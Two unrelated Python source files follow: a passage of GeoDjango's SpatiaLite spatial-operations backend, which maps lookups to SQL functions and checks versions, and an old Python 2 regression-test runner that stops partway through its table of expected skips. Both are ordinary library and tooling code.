    """For SpatiaLite Relate(<geom>, <pattern>) calls."""
    pattern_regex = re.compile(r'^[012TF\*]{9}$')
    def __init__(self, pattern):
        # Validate the 9-character intersection matrix pattern up front,
        # before delegating construction to the parent class.
        if self.pattern_regex.match(pattern) is None:
            raise ValueError('Invalid intersection matrix pattern "%s".' % pattern)
        super(SpatiaLiteRelate, self).__init__('Relate')
# Valid distance types and substitutions
# (accepted as the second element of a distance-lookup tuple; see get_distance).
dtypes = (Decimal, Distance, float) + six.integer_types
def get_dist_ops(operator):
    "Returns operations for regular distances; spherical distances are not currently supported."
    ops = [SpatiaLiteDistance(operator)]
    return tuple(ops)
class SpatiaLiteOperations(DatabaseOperations, BaseSpatialOperations):
    """Spatial SQL operations for the SpatiaLite backend.

    Maps GeoDjango lookup types onto SpatiaLite SQL functions/operators and
    performs version and feature detection for the SpatiaLite library loaded
    into the SQLite connection.
    """
    compiler_module = 'django.contrib.gis.db.models.sql.compiler'
    name = 'spatialite'
    spatialite = True
    version_regex = re.compile(r'^(?P<major>\d)\.(?P<minor1>\d)\.(?P<minor2>\d+)')
    valid_aggregates = dict([(k, None) for k in ('Extent', 'Union')])
    Adapter = SpatiaLiteAdapter
    Adaptor = Adapter # Backwards-compatibility alias.
    # SpatiaLite SQL names for the geometry functions used when composing SQL.
    area = 'Area'
    centroid = 'Centroid'
    contained = 'MbrWithin'
    difference = 'Difference'
    distance = 'Distance'
    envelope = 'Envelope'
    intersection = 'Intersection'
    length = 'GLength' # OpenGis defines Length, but this conflicts with an SQLite reserved keyword
    num_geom = 'NumGeometries'
    num_points = 'NumPoints'
    point_on_surface = 'PointOnSurface'
    scale = 'ScaleCoords'
    svg = 'AsSVG'
    sym_difference = 'SymDifference'
    transform = 'Transform'
    translate = 'ShiftCoords'
    union = 'GUnion' # OpenGis defines Union, but this conflicts with an SQLite reserved keyword
    unionagg = 'GUnion'
    from_text = 'GeomFromText'
    from_wkb = 'GeomFromWKB'
    select = 'AsText(%s)'
    # Lookup-type name -> SpatiaLite operation (or (op-class/ops, arg-type)
    # tuple for lookups that take an extra parameter, e.g. 'relate').
    geometry_functions = {
        'equals' : SpatiaLiteFunction('Equals'),
        'disjoint' : SpatiaLiteFunction('Disjoint'),
        'touches' : SpatiaLiteFunction('Touches'),
        'crosses' : SpatiaLiteFunction('Crosses'),
        'within' : SpatiaLiteFunction('Within'),
        'overlaps' : SpatiaLiteFunction('Overlaps'),
        'contains' : SpatiaLiteFunction('Contains'),
        'intersects' : SpatiaLiteFunction('Intersects'),
        'relate' : (SpatiaLiteRelate, six.string_types),
        # Returns true if B's bounding box completely contains A's bounding box.
        'contained' : SpatiaLiteFunction('MbrWithin'),
        # Returns true if A's bounding box completely contains B's bounding box.
        'bbcontains' : SpatiaLiteFunction('MbrContains'),
        # Returns true if A's bounding box overlaps B's bounding box.
        'bboverlaps' : SpatiaLiteFunction('MbrOverlaps'),
        # These are implemented here as synonyms for Equals
        'same_as' : SpatiaLiteFunction('Equals'),
        'exact' : SpatiaLiteFunction('Equals'),
    }
    distance_functions = {
        'distance_gt' : (get_dist_ops('>'), dtypes),
        'distance_gte' : (get_dist_ops('>='), dtypes),
        'distance_lt' : (get_dist_ops('<'), dtypes),
        'distance_lte' : (get_dist_ops('<='), dtypes),
    }
    geometry_functions.update(distance_functions)
    def __init__(self, connection):
        # NOTE(review): super() is keyed on DatabaseOperations (not
        # SpatiaLiteOperations), which skips DatabaseOperations.__init__ in
        # the MRO — looks intentional/legacy; confirm before changing.
        super(DatabaseOperations, self).__init__(connection)
        # Creating the GIS terms dictionary.
        gis_terms = ['isnull']
        gis_terms += self.geometry_functions.keys()
        self.gis_terms = dict([(term, None) for term in gis_terms])
    def confirm_spatial_components_versions(self):
        # Determine the version of the SpatiaLite library.
        try:
            vtup = self.spatialite_version_tuple()
            version = vtup[1:]
            if version < (2, 3, 0):
                raise ImproperlyConfigured('GeoDjango only supports SpatiaLite versions '
                                           '2.3.0 and above')
            self.spatial_version = version
        except ImproperlyConfigured:
            raise
        except Exception as msg:
            raise ImproperlyConfigured('Cannot determine the SpatiaLite version for the "%s" '
                                       'database (error was "%s"). Was the SpatiaLite initialization '
                                       'SQL loaded on this database?' %
                                       (self.connection.settings_dict['NAME'], msg))
        if version >= (2, 4, 0):
            # Spatialite 2.4.0-RC4 added AsGML and AsKML, however both
            # RC2 (shipped in popular Debian/Ubuntu packages) and RC4
            # report version as '2.4.0', so we fall back to feature detection
            try:
                self._get_spatialite_func("AsGML(GeomFromText('POINT(1 1)'))")
                self.gml = 'AsGML'
                self.kml = 'AsKML'
            except DatabaseError:
                # we are using < 2.4.0-RC4
                pass
        if version >= (3, 0, 0):
            self.geojson = 'AsGeoJSON'
    def check_aggregate_support(self, aggregate):
        """
        Checks if the given aggregate name is supported (that is, if it's
        in `self.valid_aggregates`).
        """
        agg_name = aggregate.__class__.__name__
        return agg_name in self.valid_aggregates
    def convert_geom(self, wkt, geo_field):
        """
        Converts geometry WKT returned from a SpatiaLite aggregate.
        """
        if wkt:
            return Geometry(wkt, geo_field.srid)
        else:
            return None
    def geo_db_type(self, f):
        """
        Returns None because geometry columns are added via the
        `AddGeometryColumn` stored procedure on SpatiaLite.
        """
        return None
    def get_distance(self, f, value, lookup_type):
        """
        Returns the distance parameters for the given geometry field,
        lookup value, and lookup type. SpatiaLite only supports regular
        cartesian-based queries (no spheroid/sphere calculations for point
        geometries like PostGIS).
        """
        if not value:
            return []
        value = value[0]
        if isinstance(value, Distance):
            if f.geodetic(self.connection):
                raise ValueError('SpatiaLite does not support distance queries on '
                                 'geometry fields with a geodetic coordinate system. '
                                 'Distance objects; use a numeric value of your '
                                 'distance in degrees instead.')
            else:
                # Convert the Distance object into the field's native units.
                dist_param = getattr(value, Distance.unit_attname(f.units_name(self.connection)))
        else:
            # Assume a bare number is already in the field's units.
            dist_param = value
        return [dist_param]
    def get_geom_placeholder(self, f, value):
        """
        Provides a proper substitution value for Geometries that are not in the
        SRID of the field. Specifically, this routine will substitute in the
        Transform() and GeomFromText() function call(s).
        """
        def transform_value(value, srid):
            # True when the value exists but carries a different SRID.
            return not (value is None or value.srid == srid)
        if hasattr(value, 'expression'):
            if transform_value(value, f.srid):
                placeholder = '%s(%%s, %s)' % (self.transform, f.srid)
            else:
                placeholder = '%s'
            # No geometry value used for F expression, substitute in
            # the column name instead.
            return placeholder % self.get_expression_column(value)
        else:
            if transform_value(value, f.srid):
                # Adding Transform() to the SQL placeholder.
                return '%s(%s(%%s,%s), %s)' % (self.transform, self.from_text, value.srid, f.srid)
            else:
                return '%s(%%s,%s)' % (self.from_text, f.srid)
    def _get_spatialite_func(self, func):
        """
        Helper routine for calling SpatiaLite functions and returning
        their result.
        """
        cursor = self.connection._cursor()
        try:
            try:
                cursor.execute('SELECT %s' % func)
                row = cursor.fetchone()
            except:
                # Responsibility of caller to perform error handling.
                raise
        finally:
            # Always release the cursor, even when the query fails.
            cursor.close()
        return row[0]
    def geos_version(self):
        "Returns the version of GEOS used by SpatiaLite as a string."
        return self._get_spatialite_func('geos_version()')
    def proj4_version(self):
        "Returns the version of the PROJ.4 library used by SpatiaLite."
        return self._get_spatialite_func('proj4_version()')
    def spatialite_version(self):
        "Returns the SpatiaLite library version as a string."
        return self._get_spatialite_func('spatialite_version()')
    def spatialite_version_tuple(self):
        """
        Returns the SpatiaLite version as a tuple (version string, major,
        minor, subminor).
        """
        # Getting the SpatiaLite version.
        try:
            version = self.spatialite_version()
        except DatabaseError:
            # The `spatialite_version` function first appeared in version 2.3.1
            # of SpatiaLite, so doing a fallback test for 2.3.0 (which is
            # used by popular Debian/Ubuntu packages).
            version = None
            try:
                tmp = self._get_spatialite_func("X(GeomFromText('POINT(1 1)'))")
                if tmp == 1.0: version = '2.3.0'
            except DatabaseError:
                pass
            # If no version string defined, then just re-raise the original
            # exception.
            if version is None: raise
        m = self.version_regex.match(version)
        if m:
            major = int(m.group('major'))
            minor1 = int(m.group('minor1'))
            minor2 = int(m.group('minor2'))
        else:
            raise Exception('Could not parse SpatiaLite version string: %s' % version)
        return (version, major, minor1, minor2)
    def spatial_aggregate_sql(self, agg):
        """
        Returns the spatial aggregate SQL template and function for the
        given Aggregate instance.
        """
        agg_name = agg.__class__.__name__
        if not self.check_aggregate_support(agg):
            raise NotImplementedError('%s spatial aggregate is not implmented for this backend.' % agg_name)
        agg_name = agg_name.lower()
        if agg_name == 'union': agg_name += 'agg'
        sql_template = self.select % '%(function)s(%(field)s)'
        sql_function = getattr(self, agg_name)
        return sql_template, sql_function
    def spatial_lookup_sql(self, lvalue, lookup_type, value, field, qn):
        """
        Returns the SpatiaLite-specific SQL for the given lookup value
        [a tuple of (alias, column, db_type)], lookup type, lookup
        value, the model field, and the quoting function.
        """
        alias, col, db_type = lvalue
        # Getting the quoted field as `geo_col`.
        geo_col = '%s.%s' % (qn(alias), qn(col))
        if lookup_type in self.geometry_functions:
            # See if a SpatiaLite geometry function matches the lookup type.
            tmp = self.geometry_functions[lookup_type]
            # Lookup types that are tuples take tuple arguments, e.g., 'relate' and
            # distance lookups.
            if isinstance(tmp, tuple):
                # First element of tuple is the SpatiaLiteOperation instance, and the
                # second element is either the type or a tuple of acceptable types
                # that may passed in as further parameters for the lookup type.
                op, arg_type = tmp
                # Ensuring that a tuple _value_ was passed in from the user
                if not isinstance(value, (tuple, list)):
                    raise ValueError('Tuple required for `%s` lookup type.' % lookup_type)
                # Geometry is first element of lookup tuple.
                geom = value[0]
                # Number of valid tuple parameters depends on the lookup type.
                if len(value) != 2:
                    raise ValueError('Incorrect number of parameters given for `%s` lookup type.' % lookup_type)
                # Ensuring the argument type matches what we expect.
                if not isinstance(value[1], arg_type):
                    raise ValueError('Argument type should be %s, got %s instead.' % (arg_type, type(value[1])))
                # For lookup type `relate`, the op instance is not yet created (has
                # to be instantiated here to check the pattern parameter).
                if lookup_type == 'relate':
                    op = op(value[1])
                elif lookup_type in self.distance_functions:
                    op = op[0]
            else:
                op = tmp
                geom = value
            # Calling the `as_sql` function on the operation instance.
            return op.as_sql(geo_col, self.get_geom_placeholder(field, geom))
        elif lookup_type == 'isnull':
            # Handling 'isnull' lookup type
            return "%s IS %sNULL" % (geo_col, (not value and 'NOT ' or ''))
        raise TypeError("Got invalid lookup_type: %s" % repr(lookup_type))
    # Routines for getting the OGC-compliant models.
    def geometry_columns(self):
        from django.contrib.gis.db.backends.spatialite.models import GeometryColumns
        return GeometryColumns
    def spatial_ref_sys(self):
        from django.contrib.gis.db.backends.spatialite.models import SpatialRefSys
        return SpatialRefSys
| |
#! /usr/bin/env python
"""Regression test.
This will find all modules whose name is "test_*" in the test
directory, and run them. Various command line options provide
additional facilities.
Command line options:
-v: verbose -- run tests in verbose mode with output to stdout
-q: quiet -- don't print anything except if a test fails
-g: generate -- write the output file for a test instead of comparing it
-x: exclude -- arguments are tests to *exclude*
-s: single -- run only a single test (see below)
-r: random -- randomize test execution order
-f: fromfile -- read names of tests to run from a file (see below)
-l: findleaks -- if GC is available detect tests that leak memory
-u: use -- specify which special resource intensive tests to run
-h: help -- print this text and exit
-t: threshold -- call gc.set_threshold(N)
-T: coverage -- turn on code coverage using the trace module
-D: coverdir -- Directory where coverage files are put
-N: nocoverdir -- Put coverage files alongside modules
-L: runleaks -- run the leaks(1) command just before exit
-R: huntrleaks -- search for reference leaks (needs debug build, v. slow)
If non-option arguments are present, they are names for tests to run,
unless -x is given, in which case they are names for tests not to run.
If no test names are given, all tests are run.
-v is incompatible with -g and does not compare test output files.
-T turns on code coverage tracing with the trace module.
-D specifies the directory where coverage files are put.
-N Put coverage files alongside modules.
-s means to run only a single test and exit. This is useful when
doing memory analysis on the Python interpreter (which tend to consume
too many resources to run the full regression test non-stop). The
file /tmp/pynexttest is read to find the next test to run. If this
file is missing, the first test_*.py file in testdir or on the command
line is used. (actually tempfile.gettempdir() is used instead of
/tmp).
-f reads the names of tests from the file given as f's argument, one
or more test names per line. Whitespace is ignored. Blank lines and
lines beginning with '#' are ignored. This is especially useful for
whittling down failures involving interactions among tests.
-L causes the leaks(1) command to be run just before exit if it exists.
leaks(1) is available on Mac OS X and presumably on some other
FreeBSD-derived systems.
-R runs each test several times and examines sys.gettotalrefcount() to
see if the test appears to be leaking references. The argument should
be of the form stab:run:fname where 'stab' is the number of times the
test is run to let gettotalrefcount settle down, 'run' is the number
of times further it is run and 'fname' is the name of the file the
reports are written to. These parameters all have defaults (5, 4 and
"reflog.txt" respectively), so the minimal invocation is '-R ::'.
-u is used to specify which special resource intensive tests to run,
such as those requiring large file support or network connectivity.
The argument is a comma-separated list of words indicating the
resources to test. Currently only the following are defined:
all - Enable all special resources.
audio - Tests that use the audio device. (There are known
cases of broken audio drivers that can crash Python or
even the Linux kernel.)
curses - Tests that use curses and will modify the terminal's
state and output modes.
largefile - It is okay to run some test that may create huge
files. These tests can take a long time and may
consume >2GB of disk space temporarily.
network - It is okay to run tests that use external network
resource, e.g. testing SSL support for sockets.
bsddb - It is okay to run the bsddb testsuite, which takes
a long time to complete.
decimal - Test the decimal module against a large suite that
verifies compliance with standards.
compiler - Test the compiler package by compiling all the source
in the standard library and test suite. This takes
a long time.
To enable all resources except one, use '-uall,-<resource>'. For
example, to run all the tests except for the bsddb tests, give the
option '-uall,-bsddb'.
"""
import os
import sys
import getopt
import random
import warnings
import sre
import cStringIO
import traceback
# I see no other way to suppress these warnings;
# putting them in test_grammar.py has no effect:
warnings.filterwarnings("ignore", "hex/oct constants", FutureWarning,
                        ".*test.test_grammar$")
if sys.maxint > 0x7fffffff:
    # Also suppress them in <string>, because for 64-bit platforms,
    # that's where test_grammar.py hides them.
    warnings.filterwarnings("ignore", "hex/oct constants", FutureWarning,
                            "<string>")
# MacOSX (a.k.a. Darwin) has a default stack size that is too small
# for deeply recursive regular expressions. We see this as crashes in
# the Python test suite when running test_re.py and test_sre.py. The
# fix is to set the stack limit to 2048.
# This approach may also be useful for other Unixy platforms that
# suffer from small default stack limits.
if sys.platform == 'darwin':
    try:
        import resource
    except ImportError:
        # resource module unavailable: leave the default stack limit alone.
        pass
    else:
        soft, hard = resource.getrlimit(resource.RLIMIT_STACK)
        # Raise the soft stack limit to 2 MB, capped at the hard limit.
        newsoft = min(hard, max(soft, 1024*2048))
        resource.setrlimit(resource.RLIMIT_STACK, (newsoft, hard))
from test import test_support
# Resource names accepted by the -u option (see the module docstring above).
RESOURCE_NAMES = ('audio', 'curses', 'largefile', 'network', 'bsddb',
                  'decimal', 'compiler')
def usage(code, msg=''):
    """Print the module docstring as help text, an optional message, and exit
    with the given status code."""
    print __doc__
    if msg: print msg
    sys.exit(code)
def main(tests=None, testdir=None, verbose=0, quiet=False, generate=False,
         exclude=False, single=False, randomize=False, fromfile=None,
         findleaks=False, use_resources=None, trace=False, coverdir='coverage',
         runleaks=False, huntrleaks=False):
    """Execute a test suite.
    This also parses command-line options and modifies its behavior
    accordingly.
    tests -- a list of strings containing test names (optional)
    testdir -- the directory in which to look for tests (optional)
    Users other than the Python test suite will certainly want to
    specify testdir; if it's omitted, the directory containing the
    Python test suite is searched for.
    If the tests argument is omitted, the tests listed on the
    command-line will be used. If that's empty, too, then all *.py
    files beginning with test_ will be used.
    The other default arguments (verbose, quiet, generate, exclude, single,
    randomize, findleaks, use_resources, trace and coverdir) allow programmers
    calling main() directly to set the values that would normally be set by
    flags on the command line.
    Exits the process via sys.exit(); status 1 if any test failed.
    """
    test_support.record_original_stdout(sys.stdout)
    try:
        opts, args = getopt.getopt(sys.argv[1:], 'hvgqxsrf:lu:t:TD:NLR:',
                                   ['help', 'verbose', 'quiet', 'generate',
                                    'exclude', 'single', 'random', 'fromfile',
                                    'findleaks', 'use=', 'threshold=', 'trace',
                                    'coverdir=', 'nocoverdir', 'runleaks',
                                    'huntrleaks='
                                    ])
    except getopt.error, msg:
        usage(2, msg)
    # Defaults
    if use_resources is None:
        use_resources = []
    # Command-line flags override the keyword-argument defaults.
    for o, a in opts:
        if o in ('-h', '--help'):
            usage(0)
        elif o in ('-v', '--verbose'):
            verbose += 1
        elif o in ('-q', '--quiet'):
            quiet = True;
            verbose = 0
        elif o in ('-g', '--generate'):
            generate = True
        elif o in ('-x', '--exclude'):
            exclude = True
        elif o in ('-s', '--single'):
            single = True
        elif o in ('-r', '--randomize'):
            randomize = True
        elif o in ('-f', '--fromfile'):
            fromfile = a
        elif o in ('-l', '--findleaks'):
            findleaks = True
        elif o in ('-L', '--runleaks'):
            runleaks = True
        elif o in ('-t', '--threshold'):
            import gc
            gc.set_threshold(int(a))
        elif o in ('-T', '--coverage'):
            trace = True
        elif o in ('-D', '--coverdir'):
            coverdir = os.path.join(os.getcwd(), a)
        elif o in ('-N', '--nocoverdir'):
            coverdir = None
        elif o in ('-R', '--huntrleaks'):
            # -R nwarmup:ntracked:fname -- empty fields get defaults.
            huntrleaks = a.split(':')
            if len(huntrleaks) != 3:
                print a, huntrleaks
                usage(2, '-R takes three colon-separated arguments')
            if len(huntrleaks[0]) == 0:
                huntrleaks[0] = 5
            else:
                huntrleaks[0] = int(huntrleaks[0])
            if len(huntrleaks[1]) == 0:
                huntrleaks[1] = 4
            else:
                huntrleaks[1] = int(huntrleaks[1])
            if len(huntrleaks[2]) == 0:
                huntrleaks[2] = "reflog.txt"
        elif o in ('-u', '--use'):
            # Comma-separated resource names; a '-' prefix removes a resource.
            u = [x.lower() for x in a.split(',')]
            for r in u:
                if r == 'all':
                    use_resources[:] = RESOURCE_NAMES
                    continue
                remove = False
                if r[0] == '-':
                    remove = True
                    r = r[1:]
                if r not in RESOURCE_NAMES:
                    usage(1, 'Invalid -u/--use option: ' + a)
                if remove:
                    if r in use_resources:
                        use_resources.remove(r)
                elif r not in use_resources:
                    use_resources.append(r)
    if generate and verbose:
        usage(2, "-g and -v don't go together!")
    if single and fromfile:
        usage(2, "-s and -f don't go together!")
    good = []
    bad = []
    skipped = []
    resource_denieds = []
    if findleaks:
        try:
            import gc
        except ImportError:
            print 'No GC available, disabling findleaks.'
            findleaks = False
        else:
            # Uncomment the line below to report garbage that is not
            # freeable by reference counting alone. By default only
            # garbage that is not collectable by the GC is reported.
            #gc.set_debug(gc.DEBUG_SAVEALL)
            found_garbage = []
    if single:
        # -s mode: resume from the test name recorded by the previous run.
        from tempfile import gettempdir
        filename = os.path.join(gettempdir(), 'pynexttest')
        try:
            fp = open(filename, 'r')
            next = fp.read().strip()
            tests = [next]
            fp.close()
        except IOError:
            pass
    if fromfile:
        tests = []
        fp = open(fromfile)
        for line in fp:
            guts = line.split() # assuming no test has whitespace in its name
            if guts and not guts[0].startswith('#'):
                tests.extend(guts)
        fp.close()
    # Strip .py extensions.
    if args:
        args = map(removepy, args)
    if tests:
        tests = map(removepy, tests)
    stdtests = STDTESTS[:]
    nottests = NOTTESTS[:]
    if exclude:
        # -x mode: the named tests are excluded rather than selected.
        for arg in args:
            if arg in stdtests:
                stdtests.remove(arg)
        nottests[:0] = args
        args = []
    tests = tests or args or findtests(testdir, stdtests, nottests)
    if single:
        tests = tests[:1]
    if randomize:
        random.shuffle(tests)
    if trace:
        import trace
        tracer = trace.Trace(ignoredirs=[sys.prefix, sys.exec_prefix],
                             trace=False, count=True)
    test_support.verbose = verbose # Tell tests to be moderately quiet
    test_support.use_resources = use_resources
    save_modules = sys.modules.keys()
    for test in tests:
        if not quiet:
            print test
            sys.stdout.flush()
        if trace:
            # If we're tracing code coverage, then we don't exit with status
            # if on a false return value from main.
            tracer.runctx('runtest(test, generate, verbose, quiet, testdir)',
                          globals=globals(), locals=vars())
        else:
            # runtest() returns 1 good, 0 bad, -1 skipped, -2 resource denied.
            ok = runtest(test, generate, verbose, quiet, testdir, huntrleaks)
            if ok > 0:
                good.append(test)
            elif ok == 0:
                bad.append(test)
            else:
                skipped.append(test)
                if ok == -2:
                    resource_denieds.append(test)
        if findleaks:
            gc.collect()
            if gc.garbage:
                print "Warning: test created", len(gc.garbage),
                print "uncollectable object(s)."
                # move the uncollectable objects somewhere so we don't see
                # them again
                found_garbage.extend(gc.garbage)
                del gc.garbage[:]
        # Unload the newly imported modules (best effort finalization)
        for module in sys.modules.keys():
            if module not in save_modules and module.startswith("test."):
                test_support.unload(module)
    # The lists won't be sorted if running with -r
    good.sort()
    bad.sort()
    skipped.sort()
    if good and not quiet:
        if not bad and not skipped and len(good) > 1:
            print "All",
        print count(len(good), "test"), "OK."
        if verbose:
            print "CAUTION: stdout isn't compared in verbose mode:"
            print "a test that passes in verbose mode may fail without it."
    if bad:
        print count(len(bad), "test"), "failed:"
        printlist(bad)
    if skipped and not quiet:
        print count(len(skipped), "test"), "skipped:"
        printlist(skipped)
        # Compare the skips against the platform's expected-skip table and
        # flag any surprises.
        e = _ExpectedSkips()
        plat = sys.platform
        if e.isvalid():
            surprise = set(skipped) - e.getexpected() - set(resource_denieds)
            if surprise:
                print count(len(surprise), "skip"), \
                      "unexpected on", plat + ":"
                printlist(surprise)
            else:
                print "Those skips are all expected on", plat + "."
        else:
            print "Ask someone to teach regrtest.py about which tests are"
            print "expected to get skipped on", plat + "."
    if single:
        # Record the next test to run (or clean up when the suite is done).
        alltests = findtests(testdir, stdtests, nottests)
        for i in range(len(alltests)):
            if tests[0] == alltests[i]:
                if i == len(alltests) - 1:
                    os.unlink(filename)
                else:
                    fp = open(filename, 'w')
                    fp.write(alltests[i+1] + '\n')
                    fp.close()
                break
        else:
            os.unlink(filename)
    if trace:
        r = tracer.results()
        r.write_results(show_missing=True, summary=True, coverdir=coverdir)
    if runleaks:
        os.system("leaks %d" % os.getpid())
    sys.exit(len(bad) > 0)
# Tests that always run first, in this fixed order (basic language sanity
# checks the rest of the suite depends on).
STDTESTS = [
    'test_grammar',
    'test_opcodes',
    'test_operations',
    'test_builtin',
    'test_exceptions',
    'test_types',
]
# Modules in the test package that are support code, not tests themselves.
NOTTESTS = [
    'test_support',
    'test_future1',
    'test_future2',
    'test_future3',
]
def findtests(testdir=None, stdtests=STDTESTS, nottests=NOTTESTS):
    """Return a list of all applicable test modules."""
    directory = testdir or findtestdir()
    suffix = os.extsep + "py"
    extras = []
    for entry in os.listdir(directory):
        if not (entry.startswith("test_") and entry.endswith(suffix)):
            continue
        modname = entry[:-3]
        # The standard tests lead the list; support modules are excluded.
        if modname not in stdtests and modname not in nottests:
            extras.append(modname)
    extras.sort()
    return stdtests + extras
def runtest(test, generate, verbose, quiet, testdir=None, huntrleaks=False):
    """Run a single test.
    test -- the name of the test
    generate -- if true, generate output, instead of running the test
    and comparing it to a previously created output file
    verbose -- if true, print more messages
    quiet -- if true, don't print 'skipped' messages (probably redundant)
    testdir -- test directory
    Returns 1 for success, 0 for failure/crash, -1 for a skipped test and
    -2 when a required resource was denied.
    """
    test_support.unload(test)
    if not testdir:
        testdir = findtestdir()
    outputdir = os.path.join(testdir, "output")
    outputfile = os.path.join(outputdir, test)
    # In non-verbose mode stdout is captured so it can be compared against
    # the expected-output file.
    if verbose:
        cfp = None
    else:
        cfp = cStringIO.StringIO()
    if huntrleaks:
        refrep = open(huntrleaks[2], "a")
    try:
        save_stdout = sys.stdout
        try:
            if cfp:
                sys.stdout = cfp
                print test # Output file starts with test name
            if test.startswith('test.'):
                abstest = test
            else:
                # Always import it from the test package
                abstest = 'test.' + test
            the_package = __import__(abstest, globals(), locals(), [])
            the_module = getattr(the_package, test)
            # Most tests run to completion simply as a side-effect of
            # being imported. For the benefit of tests that can't run
            # that way (like test_threaded_import), explicitly invoke
            # their test_main() function (if it exists).
            indirect_test = getattr(the_module, "test_main", None)
            if indirect_test is not None:
                indirect_test()
            if huntrleaks:
                # This code *is* hackish and inelegant, yes.
                # But it seems to do the job.
                import copy_reg
                # Snapshot global caches so each repetition starts clean.
                fs = warnings.filters[:]
                ps = copy_reg.dispatch_table.copy()
                pic = sys.path_importer_cache.copy()
                import gc
                def cleanup():
                    # Restore/clear every interpreter-wide cache a test might
                    # have touched, so refcount deltas reflect real leaks.
                    import _strptime, urlparse, warnings, dircache
                    from distutils.dir_util import _path_created
                    _path_created.clear()
                    warnings.filters[:] = fs
                    gc.collect()
                    sre.purge()
                    _strptime._regex_cache.clear()
                    urlparse.clear_cache()
                    copy_reg.dispatch_table.clear()
                    copy_reg.dispatch_table.update(ps)
                    sys.path_importer_cache.clear()
                    sys.path_importer_cache.update(pic)
                    dircache.reset()
                if indirect_test:
                    def run_the_test():
                        indirect_test()
                else:
                    def run_the_test():
                        reload(the_module)
                deltas = []
                # huntrleaks[0] warmup runs, then huntrleaks[1] tracked runs.
                repcount = huntrleaks[0] + huntrleaks[1]
                print >> sys.stderr, "beginning", repcount, "repetitions"
                print >> sys.stderr, \
                      ("1234567890"*(repcount//10 + 1))[:repcount]
                for i in range(repcount):
                    rc = sys.gettotalrefcount()
                    run_the_test()
                    sys.stderr.write('.')
                    cleanup()
                    deltas.append(sys.gettotalrefcount() - rc - 2)
                print >>sys.stderr
                if max(map(abs, deltas[-huntrleaks[1]:])) > 0:
                    print >>sys.stderr, test, 'leaked', \
                          deltas[-huntrleaks[1]:], 'references'
                    print >>refrep, test, 'leaked', \
                          deltas[-huntrleaks[1]:], 'references'
                # The end of the huntrleaks hackishness.
        finally:
            sys.stdout = save_stdout
    except test_support.ResourceDenied, msg:
        if not quiet:
            print test, "skipped --", msg
            sys.stdout.flush()
        return -2
    except (ImportError, test_support.TestSkipped), msg:
        if not quiet:
            print test, "skipped --", msg
            sys.stdout.flush()
        return -1
    except KeyboardInterrupt:
        raise
    except test_support.TestFailed, msg:
        print "test", test, "failed --", msg
        sys.stdout.flush()
        return 0
    except:
        # Any other exception counts as a crash; report it as a failure.
        type, value = sys.exc_info()[:2]
        print "test", test, "crashed --", str(type) + ":", value
        sys.stdout.flush()
        if verbose:
            traceback.print_exc(file=sys.stdout)
            sys.stdout.flush()
        return 0
    else:
        if not cfp:
            return 1
        output = cfp.getvalue()
        if generate:
            # -g mode: write the captured output as the new expected output.
            if output == test + "\n":
                if os.path.exists(outputfile):
                    # Write it since it already exists (and the contents
                    # may have changed), but let the user know it isn't
                    # needed:
                    print "output file", outputfile, \
                          "is no longer needed; consider removing it"
                else:
                    # We don't need it, so don't create it.
                    return 1
            fp = open(outputfile, "w")
            fp.write(output)
            fp.close()
            return 1
        if os.path.exists(outputfile):
            fp = open(outputfile, "r")
            expected = fp.read()
            fp.close()
        else:
            # No expected-output file: the test should print only its name.
            expected = test + "\n"
        if output == expected or huntrleaks:
            return 1
        print "test", test, "produced unexpected output:"
        sys.stdout.flush()
        reportdiff(expected, output)
        sys.stdout.flush()
        return 0
def reportdiff(expected, output):
    """Print a human-readable diff between the expected and actual test
    output, framed by rows of asterisks."""
    import difflib
    print "*" * 70
    # splitlines(1) keeps the line endings so lines print unmodified.
    a = expected.splitlines(1)
    b = output.splitlines(1)
    sm = difflib.SequenceMatcher(a=a, b=b)
    tuples = sm.get_opcodes()
    def pair(x0, x1):
        # x0:x1 are 0-based slice indices; convert to 1-based line indices.
        x0 += 1
        if x0 >= x1:
            return "line " + str(x0)
        else:
            return "lines %d-%d" % (x0, x1)
    for op, a0, a1, b0, b1 in tuples:
        if op == 'equal':
            pass
        elif op == 'delete':
            print "***", pair(a0, a1), "of expected output missing:"
            for line in a[a0:a1]:
                print "-", line,
        elif op == 'replace':
            print "*** mismatch between", pair(a0, a1), "of expected", \
                  "output and", pair(b0, b1), "of actual output:"
            for line in difflib.ndiff(a[a0:a1], b[b0:b1]):
                print line,
        elif op == 'insert':
            print "***", pair(b0, b1), "of actual output doesn't appear", \
                  "in expected output after line", str(a1)+":"
            for line in b[b0:b1]:
                print "+", line,
        else:
            print "get_opcodes() returned bad tuple?!?!", (op, a0, a1, b0, b1)
    print "*" * 70
def findtestdir():
    """Return the directory containing this script, falling back to the
    current directory when the path has no directory component."""
    if __name__ == '__main__':
        script = sys.argv[0]
    else:
        script = __file__
    return os.path.dirname(script) or os.curdir
def removepy(name):
    """Return *name* with a trailing '.py' extension stripped, if present."""
    if not name.endswith(os.extsep + "py"):
        return name
    return name[:-3]
def count(n, word):
    """Return '<n> <word>', naively pluralized with 's' when n != 1."""
    if n == 1:
        suffix = ""
    else:
        suffix = "s"
    return "%d %s%s" % (n, word, suffix)
def printlist(x, width=70, indent=4):
    """Print the elements of iterable x to stdout.
    Optional arg width (default 70) is the maximum line length.
    Optional arg indent (default 4) is the number of blanks with which to
    begin each line.
    """
    from textwrap import fill
    blanks = ' ' * indent
    # textwrap.fill does both the wrapping and the uniform indentation.
    print fill(' '.join(map(str, x)), width,
               initial_indent=blanks, subsequent_indent=blanks)
# Map sys.platform to a string containing the basenames of tests
# expected to be skipped on that platform.
#
# Special cases:
# test_pep277
# The _ExpectedSkips constructor adds this to the set of expected
# skips if not os.path.supports_unicode_filenames.
# test_normalization
# Whether a skip is expected here depends on whether a large test
# input file has been downloaded. test_normalization.skip_expected
# controls that.
# test_socket_ssl
# Controlled by test_socket_ssl.skip_expected. Requires the network
# resource, and a socket module with ssl support.
# test_timeout
# Controlled by test_timeout.skip_expected. Requires the network
# resource and a socket module.
# test_codecmaps_*
# Whether a skip is expected here depends on whether a large test
# input file has been downloaded. test_codecmaps_*.skip_expected
# controls that.
_expectations = {
'win32':
"""
test__locale
test_applesingle
test_al
test_bsddb185
test_bsddb3
test_cd
test_cl
test_commands
test_crypt
test_curses
test_dbm
test_dl
test_fcntl
test_fork1
test_gdbm
test_gl
test_grp
test_imgfile
test_ioctl
test_largefile
test_linuxaudiodev
test_mhlib
test_nis
test_openpty
test_ossaudiodev
test_poll
test_posix
test_pty
test_pwd
test_resource
test_signal
test_sunaudiodev
test_threadsignals
test_timing
""",
'linux2':
"""
test_al
test_applesingle
test_bsddb185
test_cd
test_cl
test_curses
